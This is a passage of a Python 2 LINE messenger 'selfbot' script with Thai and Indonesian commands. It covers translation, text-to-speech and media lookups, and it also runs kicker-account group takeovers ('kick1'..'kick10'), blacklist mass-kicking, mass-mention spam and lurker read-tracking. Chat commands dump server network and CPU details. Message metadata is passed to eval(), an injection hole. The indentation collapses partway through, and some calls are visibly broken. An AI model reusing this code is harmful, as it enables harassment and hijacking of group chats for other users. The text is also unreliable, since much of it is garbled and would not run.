url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO KO----\n" + "" + result + "\n------SUKSES-----")
elif "Ko@id" in msg.text:
bahasa_awal = 'ko'
bahasa_tujuan = 'id'
kata = msg.text.replace("Ko@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM KO----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
                    elif msg.text.lower() == 'welcome':
                      # Greet the group by text and by a Thai TTS clip (gTTS).
                      ginfo = cl.getGroup(msg.to)
                      cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
                      jawaban1 = ("ยินดีต้อนรับเข้าสู่กลุ่ม " + str(ginfo.name))
                      cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
                      tts = gTTS(text=jawaban1, lang='th')
                      tts.save('hasil.mp3')
                      # NOTE(review): sendAudioWithUrl is given a local filename, not
                      # a URL — confirm the client accepts local paths here.
                      cl.sendAudioWithUrl(msg.to,'hasil.mp3')
                    elif "Say-id " in msg.text:
                      # Text-to-speech in Indonesian.
                      say = msg.text.replace("Say-id ","")
                      lang = 'id'
                      tts = gTTS(text=say, lang=lang)
                      tts.save("hasil.mp3")
                      cl.sendAudioWithUrl(msg.to,"hasil.mp3")
                    elif "Say-en " in msg.text:
                      # Text-to-speech in English.
                      say = msg.text.replace("Say-en ","")
                      lang = 'en'
                      tts = gTTS(text=say, lang=lang)
                      tts.save("hasil.mp3")
                      cl.sendAudioWithUrl(msg.to,"hasil.mp3")
                    elif "Say-jp " in msg.text:
                      # Text-to-speech in Japanese.
                      say = msg.text.replace("Say-jp ","")
                      lang = 'ja'
                      tts = gTTS(text=say, lang=lang)
                      tts.save("hasil.mp3")
                      cl.sendAudioWithUrl(msg.to,"hasil.mp3")
                    elif "Say-ar " in msg.text:
                      # Text-to-speech in Arabic.
                      say = msg.text.replace("Say-ar ","")
                      lang = 'ar'
                      tts = gTTS(text=say, lang=lang)
                      tts.save("hasil.mp3")
                      cl.sendAudioWithUrl(msg.to,"hasil.mp3")
                    elif "Say-ko " in msg.text:
                      # Text-to-speech in Korean.
                      say = msg.text.replace("Say-ko ","")
                      lang = 'ko'
                      tts = gTTS(text=say, lang=lang)
                      tts.save("hasil.mp3")
                      cl.sendAudioWithUrl(msg.to,"hasil.mp3")
                    elif "Kapan " in msg.text:
                      # Magic-8-ball style "when?" answer, spoken in Indonesian.
                      tanya = msg.text.replace("Kapan ","")
                      jawab = ("kapan kapan","besok","satu abad lagi","Hari ini","Tahun depan","Minggu depan","Bulan depan","Sebentar lagi")
                      jawaban = random.choice(jawab)
                      tts = gTTS(text=jawaban, lang='id')
                      tts.save('tts.mp3')
                      cl.sendAudioWithUrl(msg.to,'tts.mp3')
                    elif "Apakah " in msg.text:
                      # Magic-8-ball style yes/no answer, spoken in Indonesian.
                      tanya = msg.text.replace("Apakah ","")
                      jawab = ("Ya","Tidak","Mungkin","Bisa jadi")
                      jawaban = random.choice(jawab)
                      tts = gTTS(text=jawaban, lang='id')
                      tts.save('tts.mp3')
                      cl.sendAudioWithUrl(msg.to,'tts.mp3')
                    elif '#dy ' in msg.text:
                      # YouTube search: scrape the first result and send it as video.
                      try:
                        textToSearch = (msg.text).replace('#dy ', "").strip()
                        query = urllib.quote(textToSearch)
                        url = "https://www.youtube.com/results?search_query=" + query
                        response = urllib2.urlopen(url)
                        html = response.read()
                        soup = BeautifulSoup(html, "html.parser")
                        results = soup.find(attrs={'class':'yt-uix-tile-link'})
                        ght = ('https://www.youtube.com' + results['href'])
                        cl.sendVideoWithUrl(msg.to, ght)
                      except:
                        cl.sendText(msg.to,"Could not find it")
                    elif 'mp4 ' in msg.text:
                      # Same YouTube scrape with a different trigger word.
                      try:
                        textToSearch = (msg.text).replace('mp4 ',"").strip()
                        query = urllib.quote(textToSearch)
                        url = "https://www.youtube.com/results?search_query=" + query
                        response = urllib2.urlopen(url)
                        html = response.read()
                        soup = BeautifulSoup(html, "html.parser")
                        results = soup.find(attrs={'class':'yt-uix-tile-link'})
                        ght = ('https://www.youtube.com' + results['href'])
                        cl.sendVideoWithUrl(msg.to, ght)
                      except:
                        cl.sendText(msg.to, "Could not find it")
                    elif "Lirik " in msg.text:
                      # Song lyrics via the joox proxy API.
                      # NOTE(review): msg.text.lower() lowercases the whole string,
                      # so replace("Lirik ") never matches and the trigger word stays
                      # in songname — confirm against the API's tolerance.
                      try:
                        songname = msg.text.lower().replace("Lirik ","")
                        params = {'songname': songname}
                        r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
                        data = r.text
                        data = json.loads(data)
                        for song in data:
                          hasil = 'Lyric Lagu ('
                          hasil += song[0]
                          hasil += ')\n\n'
                          hasil += song[5]
                          cl.sendText(msg.to, hasil)
                      except Exception as wak:
                        cl.sendText(msg.to, str(wak))
                    elif "/vk " in msg.text:
                      # Thai Wikipedia summary lookup.
                      try:
                        wiki = msg.text.lower().replace("/vk ","")
                        wikipedia.set_lang("th")
                        pesan="Title ("
                        pesan+=wikipedia.page(wiki).title
                        pesan+=")\n\n"
                        pesan+=wikipedia.summary(wiki, sentences=1)
                        pesan+="\n"
                        pesan+=wikipedia.page(wiki).url
                        cl.sendText(msg.to, pesan)
                      except:
                        try:
                          pesan="Over Text Limit! Please Click link\n"
                          pesan+=wikipedia.page(wiki).url
                          cl.sendText(msg.to, pesan)
                        except Exception as e:
                          cl.sendText(msg.to, str(e))
                    elif "Music " in msg.text:
                      # Song search + audio download via the joox proxy API.
                      try:
                        songname = msg.text.lower().replace("Music ","")
                        params = {'songname': songname}
                        r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
                        data = r.text
                        data = json.loads(data)
                        for song in data:
                          hasil = 'This is Your Music\n'
                          hasil += 'Judul : ' + song[0]
                          hasil += '\nDurasi : ' + song[1]
                          hasil += '\nLink Download : ' + song[4]
                          cl.sendText(msg.to, hasil)
                          cl.sendText(msg.to, "Please Wait for audio...")
                          cl.sendAudioWithUrl(msg.to, song[4])
                      except Exception as njer:
                        cl.sendText(msg.to, str(njer))
elif "#Image " in msg.text:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithUrl(msg.to,path)
except:
pass
elif "#ค้นหารูปภาพ:" in msg.text:
search = msg.text.replace("ค้นหารูปภาพ:","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithUrl(msg.to,path)
except:
pass
elif "#Profileig " in msg.text:
try:
instagram = msg.text.replace("#Profileig ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "Link: " + "https://www.instagram.com/" + instagram
text = "Name : "+namaIG+"\nUsername : "+usernameIG+"\nBiography : "+bioIG+"\nFollower : "+followerIG+"\nFollowing : "+followIG+"\nPost : "+mediaIG+"\nVerified : "+verifIG+"\nPrivate : "+privateIG+"" "\n" + link
cl.sendImageWithUrl(msg.to, profileIG)
cl.sendText(msg.to, str(text))
except Exception as e:
cl.sendText(msg.to, str(e))
elif "Checkdate " in msg.text:
tanggal = msg.text.replace("Checkdate ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendText(msg.to,"============ I N F O R M A S I ============\n"+"Date Of Birth : "+lahir+"\nAge : "+usia+"\nUltah : "+ultah+"\nZodiak : "+zodiak+"\n============ I N F O R M A S I ============")
elif msg.text in ["Time","time"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["วันอาทิต์", "วันจันทร์", "วันอังคาร", "วันพุธ", "วันพฤหัสบดี", "วันศุกร์", "วันเสาร์"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + bln + " - " + inihari.strftime('%Y') + "\nเวลาขณะนี้ : [ " + inihari.strftime('%H:%M:%S') + " ]"
cl.sendText(msg.to, rst)
#========================================================#
elif msg.text.lower() == 'ifconfig':
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif msg.text in ["Pmcheck","เชคดำ","เช็คดำ"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Banlist")
num=1
msgs="══════════List Blacklist═════════"
for mi_d in wait["blacklist"]:
msgs+="\n[%i] %s" % (num, cl.getContact(mi_d).displayName)
num=(num+1)
msgs+="\n══════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(wait["blacklist"])
cl.sendText(msg.to, msgs)
elif msg.text in ["Mcheckcontact","Cb"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Blacklist")
h = ""
for i in wait["blacklist"]:
h = cl.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
cl.sendMessage(M)
elif msg.text in ["Midban","Mid ban"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
num=1
cocoa = "══════════List Blacklist═════════"
for mm in matched_list:
cocoa+="\n[%i] %s" % (num, mm)
num=(num+1)
cocoa+="\n═════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(matched_list)
cl.sendText(msg.to,cocoa)
elif msg.text.lower() == '1kill':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki1.sendText(msg.to,"Tidak ada Daftar Blacklist")
return
for jj in matched_list:
try:
ki1.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#==============================================#
elif msg.text in ["in on"]:
if msg.from_ in admin:
if wait["pautoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["pautoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["in off"]:
if msg.from_ in admin:
if wait["pautoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["pautoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif "/ตัส" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"[name]\n" + contact.displayName + "\n[mid]\n" + contact.mid + "\n[statusmessage]\n" + contact.statusMessage + "\n[profilePicture]\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[homePicture]\n" + str(cu))
except:
cl.sendText(msg.to,"[name]\n" + contact.displayName + "\n[mid]\n" + contact.mid + "\n[statusmessage]\n" + contact.statusMessage + "\n[homePicture]\n" + str(cu))
#=============================================
elif msg.text in ["!Sp"]:
start = time.time()
cl.sendText(msg.to, "Waiting...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sTamii Server" % (elapsed_time))
# ----------------- BAN MEMBER BY TAG 2TAG ATAU 10TAG MEMBER
elif ("Bl " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned Bos")
except:
pass
#-------------Fungsi Respon Start---------------------#
elif msg.text in ["#Cinvite"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact 😉")
elif "Gift @" in msg.text:
_name = msg.text.replace("Gift @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentType = 2
msg.contentMetadata={'PRDID': '89131c1a-e549-4bd5-9e60-e24de0d2e252',
'PRDTYPE': 'THEME',
'MSGTPL': '10'}
msg.text = None
cl.sendMessage(msg,g)
cl.sendText(msg.to, "Done...")
elif msg.text in ["Mchecky"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"nothing")
else:
cl.sendText(msg.to,"Blacklist user\nมีบัญชีดำของคุณอยู่กลุ่มนี้")
xname = ""
for mi_d in wait["blacklist"]:
xname = cl.getContact(mi_d).displayName + ""
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(mm)+'}]}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
elif msg.text in ["Name me","Men"]:
G = cl.getProfile()
X = G.displayName
cl.sendText(msg.to,X)
elif "siri " in msg.text.lower():
query = msg.text.lower().replace("siri ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "siri:" in msg.text.lower():
query = msg.text.lower().replace("siri:","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "siri-en " in msg.text.lower():
query = msg.text.lower().replace("siri-en ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'en', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "say " in msg.text.lower():
query = msg.text.lower().replace("say ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif msg.text in ["kick1","K1"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki1.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki1.updateGroup(G)
elif msg.text in ["kick2","K2"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
elif msg.text in ["kick3","K3"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki3.updateGroup(G)
elif msg.text in ["kick4","K4"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki4.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki4.updateGroup(G)
elif msg.text in ["kick5","K5"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki5.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki5.updateGroup(G)
elif msg.text in ["kick6","K6"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki6.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki6.updateGroup(G)
elif msg.text in ["kick7","K7"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki7.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki7.updateGroup(G)
elif msg.text in ["kick8","K8"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki8.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki8.updateGroup(G)
elif msg.text in ["kick9","K9"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki9.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki9.updateGroup(G)
elif msg.text in ["kick10","K10"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki10.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki10.updateGroup(G)
elif '/w ' in msg.text.lower():
try:
wiki = msg.text.lower().replace("/w ","")
wikipedia.set_lang("th")
pesan="Wikipedia : "
pesan+=wikipedia.page(wiki).title
pesan+="\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Text Terlalu Panjang Silahkan Click link di bawah ini\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif "/go " in msg.text:
tanggal = msg.text.replace("/go ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendText(msg.to,"Tanggal Lahir : "+lahir+"\n\nUmur : "+usia+"\n\nUltah : "+ultah+"\n\nZodiak : "+zodiak)
elif "declined" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
except:
pass
elif "[Auto] " in msg.text:
msg.contentType = 13
_name = msg.text.replace("[Auto] ","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
elif "☜ʕ•ﻌ•ʔ " in msg.text:
msg.contentType = 13
_name = msg.text.replace("☜ʕ•ﻌ•ʔ ","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
if op.type == 25:
msg = op.message
if msg.text.lower() in ["pheytcg fgtagg all"]:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
mention(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, len(nama)):
nm2 += [nama[j]]
mention(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, len(nama)):
nm3 += [nama[k]]
mention(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention(msg.to, nm3)
for l in range(301, len(nama)):
nm4 += [nama[l]]
mention(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention(msg.to, nm3)
for l in range(301, 400):
nm4 += [nama[l]]
mention(msg.to, nm4)
for h in range(401, len(nama)):
nm5 += [nama[h]]
mention(msg.to, nm5)
if jml > 500:
cl.sendText(msg.to,'Member melebihi batas.')
cnt = Message()
cnt.text = "PHET TAG DONE : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
if op.type == 26:
msg = op.message
if msg.text.lower() in ["1123"]:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
mention(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, len(nama)):
nm2 += [nama[j]]
mention(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, len(nama)):
nm3 += [nama[k]]
mention(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention(msg.to, nm3)
for l in range(301, len(nama)):
nm4 += [nama[l]]
mention(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention(msg.to, nm3)
for l in range(301, 400):
nm4 += [nama[l]]
mention(msg.to, nm4)
for h in range(401, len(nama)):
nm5 += [nama[h]]
mention(msg.to, nm5)
if jml > 500:
cl.sendText(msg.to,'Member melebihi batas.')
cnt = Message()
cnt.text = "PHET TAG DONE : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
elif msg.text in ["คท"]:
cl.sendText(msg.to,"😆เช็คจัง กลัวmybotหลุด ล่ะสิ😆")
elif msg.text in ["เทสmybot"]:
cl.sendText(msg.to,"SELF BOT\n[By.☬ARIFISTIFIK☬]")
elif msg.text in [".อยู่ไหม"]:
cl.sendText(msg.to,"อยู่...")
elif msg.text in ["/อยู่ไหม"]:
cl.sendText(msg.to,"เรื่องของกู...")
elif msg.text in ["/Online checkไหม"]:
cl.sendText(msg.to,"Online check")
elif msg.text in ["/ปิดป้องกัน"]:
cl.sendText(msg.to,"ปิดป้องกัน")
elif "Lurk on" == msg.text.lower():
if msg.to in wait2['readPoint']:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to,"Lurking already on\nเปิดการอ่านอัตโนมัตกรุณาพิมพ์ ➠ /อ่าน")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to, "โปรเเกรมเปิดการอ่านอัตโนมัต\nSet reading point:\n" + datetime.now().strftime('%H:%M:%S'))
print wait2
elif "Lurk off" == msg.text.lower():
if msg.to not in wait2['readPoint']:
cl.sendText(msg.to,"Lurking already off\nปิดการอ่านอัตโนมัต")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
cl.sendText(msg.to, "ปิดการอ่านอัตโนมัต\nDelete reading point:\n" + datetime.now().strftime('%H:%M:%S'))
elif "/อ่าน" == msg.text.lower():
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
cl.sendText(msg.to, "SELF BOT\n[By.☬ARIFISTIFIK☬] \n\nLurkers:\nNone")
else:
chiya = []
for rom in wait2["ROM"][msg.to].items():
chiya.append(rom[1])
cmem = cl.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = 'Lurkers:\n'
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
